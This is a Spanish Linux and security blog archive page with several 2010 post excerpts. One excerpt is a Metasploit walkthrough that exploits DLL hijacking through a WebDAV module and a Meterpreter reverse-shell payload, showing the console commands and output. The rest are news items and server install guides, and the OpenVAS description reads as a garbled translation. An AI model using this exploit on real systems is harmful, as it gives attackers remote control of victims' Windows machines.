UNIX – *BSD – GNU/Linux – Página 37

DLL Hijacking con Metasploit

6 septiembre, 20104 febrero, 2017 rokitoh Deja un comentario

Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.

Abrimos metasplit

rokitoh@red-orbita# msfconsole

msf > use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»

EXTENSIONS => grp p7c vcf wab

msf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111

lhost => 192.168.1.111

msf exploit(webdav_dll_hijacker) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.111:4444

[*]

[*] Exploit links are now available at \192.168.1.111documents

[*]

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.111:80/

Debian 7 se llamara Wheezy

4 septiembre, 20104 septiembre, 2010 rokitoh Deja un comentario

Continuando con los nombres sacados de la película Toy Story para llamar a las versiones de Debian, nos enteramos por las listas de correo de que la versión 7 llevará el nombre del pingüino con corbata roja de la película: Wheezy(aunque no salía en Toy Story 1).

Poco más que decir. La congelación de la versión 6 “Squeeze” sigue su curso y en el mail podemos encontrar las directrices que marcan el subir o no nuevos paquetes a Sid, y su posible inclusión en Squeeze.

Wave in a Box: Google Wave en formato Open Source

4 septiembre, 20104 septiembre, 2010 rokitoh Deja un comentario

Google ha anunciado el lanzamiento del proyecto “Wave in a Box”, una versión Open Source independiente y totalmente funcional de su desarrollo de mensajería y colaboración recientemente cancelado, Google Wave.

La empresa afirma que ya ha abierto 200.000 líneas de código como parte del desarrollo del protocolo Wave, y planea expandir esa apertura a un servidor de prueba que lanzará para ofrecer una “aplicación más completa”. Grandes noticias para los que querían seguir usando Wave.

iOS ya supera a Linux en cuota de mercado

4 septiembre, 20104 septiembre, 2010 rokitoh Deja un comentario

Triste, pero cierto: según los datos de NetApplications iOS, el sistema operativo de los iPhone, iPod touch e iPad de Apple ya ha logrado superar en cuota de mercado a GNU/Linux, al menos en lo que se refiere en dispositivos conectados a Internet.

NetApplications publica cada mes sus informes de evolución del mercado de los navegadores y los sistemas operativos, y probablemente el dato más relevante de este mes es el hecho de que iOS ya ha pasado definitivamente a Linux (empezó a hacerlo en julio) en cuota de sistemas operativos a la hora de navegar por Internet.

Instalar servidor DNS en centOS 5.5

2 septiembre, 201022 junio, 2022 rokitoh 6 comentarios

¿QUE ES DNS?

Es e protocolo de resolución de nombres para redes TCP/IP, Como internet. Un servidor DNS aloja la información que permite a los equipos clientes resolver nombres DNS alfanuméricos fáciles de recordar para las direcciones IP que los equipos utilizan para comunicarse entre si.

Tipo de dominio DNS

DOMINIO DE NIVEL SUPERIOR: Nombre de dos o tres letras que se utiliza para indicar un país, una región o el tipo de organización que usa un nombre: ( Ejemplo: “.com” )

DOMINIO DE SEGUNDO NIVEL: Nombre de longitud variable registrados que un individuo u organización utiliza e internet. Estos nombres siempre se basan en un dominio a nivel superior apropiado, según el tipo de organización o ubicación geográfica donde se utiliza el nombre ( EJEMPLO: “RED-ORBITA.” )

SUBDOMINIO: Nombres adiciones que puede crear una organización derivados del nombre de domino registrado de segundo nivel, Incluyen los nombres agregados para desarrollar del árbol de nombres de DNS en una organizaron y que la dividen en departamentos o ubicaciones geográficas (EJEMPLO: “ ROKITOH.RED-ORBITA.COM”)

Leer más

Phoronix Test Suite 2.8, benchmarks para todos

31 agosto, 201031 agosto, 2010 rokitoh Deja un comentario

Los responsables de Phoronix llevan años trabajando en Phoronix Test Suite (PTS), una suite de herramientas de análisis y benchmark que permite evaluar el rendimiento de sistemas Linux, pero no solo eso: también permite comparar ese rendimiento con el que obtendríamos en sistemas Mac OS X y Windows.

Servidor de impresión en Debian

30 agosto, 201022 junio, 2022 rokitoh Deja un comentario

¿Que es un servidor de impresión? (Wikipedia)

El Sistema de impresión común de Unix (Common Unix Printing System en inglés, abreviado CUPS) es un sistema de impresión modular para sistemas operativos de tipo Unix que permite que un computador actúe como servidor de impresión. Un computador que ejecuta CUPS actúa como un servidor que puede aceptar tareas de impresión desde otros computadores clientes, los procesa y los envía al servidor de impresión apropiado.

CUPS está compuesto por una cola de impresión con su planificador, un sistema de filtros que convierte datos para imprimir hacia formatos que la impresora conozca, y un sistema de soporte que envía los datos al dispositivo de impresión. CUPS utiliza el protocolo IPP(Internet Printing Protocol) como base para el manejo de tareas de impresión y de colas de impresión. También provee los comandos tradicionales de línea de comandos de impresión de los sistemas Unix, junto a un soporte limitado de operaciones bajo el protocolo server message block (SMB). Los controladores de dipositivos de impresión que CUPS provee pueden ser configurados utilizando archivos de texto con formato Descripción de impresoras PostScript (PPD, PostScript Printer Description en inglés) de Adobe Systems. Existen varias interfaces de usuario para diferentes plataformas para configurar CUPS; cuenta también con una interfaz como aplicación Web. CUPS es software libre y se distribuye bajo licencia GNU General Public License y GNU Lesser General Public License, Versión 2.

Instalar Nessus 4.2.2 en debian

29 agosto, 201022 junio, 2022 rokitoh Deja un comentario

Nessus es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Consiste en nessusd, el daemon Nessus, que realiza el escaneo en el sistema objetivo, y nessus, el cliente (basado en consola o gráfico) que muestra el avance y reporte de los escaneos. Desde consola nessus puede ser programado para hacer escaneos programados con cron.

Instalar OpenVAS 3.1 en Debian Lenny

28 agosto, 201029 junio, 2011 rokitoh Deja un comentario

¿Que es OpenVAS?

OpenVAS (Explorador del gravamen de la vulnerabilidad de OpenSource), previamente GNessUs, es a GLP bifurcación del Nessus explorador de la seguridad para no prohibir a futuro el desarrollo libre de la herramienta ahora-propietaria.

OpenVAS fue propuesto originalmente cerca pentesters en Seguridad de la computadora de Portcullis y entonces anunciado por Tim Brown encendidoSlashdot. OpenVAS es un proyecto del miembro de Software en el interés público[1]. Previamente, había sido votado hacia fuera porque el proyecto aparecía ser muerto.[2] Los dominios de OpenVAS fueron donados por SecuritySpace, el recibimiento fue donado por la Nth dimensión/el Internet público y los honorarios de conferencia de DevCon 1 eran pagados para cerca Intevation y Sistemas del DN.

Intranet en Windows 2003 Server Enterprise con IIS.

26 agosto, 201022 junio, 2022 rokitoh Deja un comentario

¿Que es una intranet?

Una intranet es una red de ordenadores privados que utiliza tecnología Internet para compartir dentro de una organización parte de sus sistemas de información y sistemas operacionales. El término intranet se utiliza en oposición a internet, una red entre organizaciones, haciendo referencia por contra a una red comprendida en el ámbito de una organización.

¿Que es IIS?

Internet Information Services , IIS, es una serie de servicios para los ordenadores que funcionan con Windows. Originalmente era parte del Option Pack para Windows NT. Luego fue integrado en otros sistemas operativos de Microsoft destinados a ofrecer servicios, como Windows 2000 o Windows Server 2003. Windows XP Profesional incluye una versión limitada de IIS. Los servicios que ofrece son: FTP, SMTP, NNTP yHTTP/HTTPS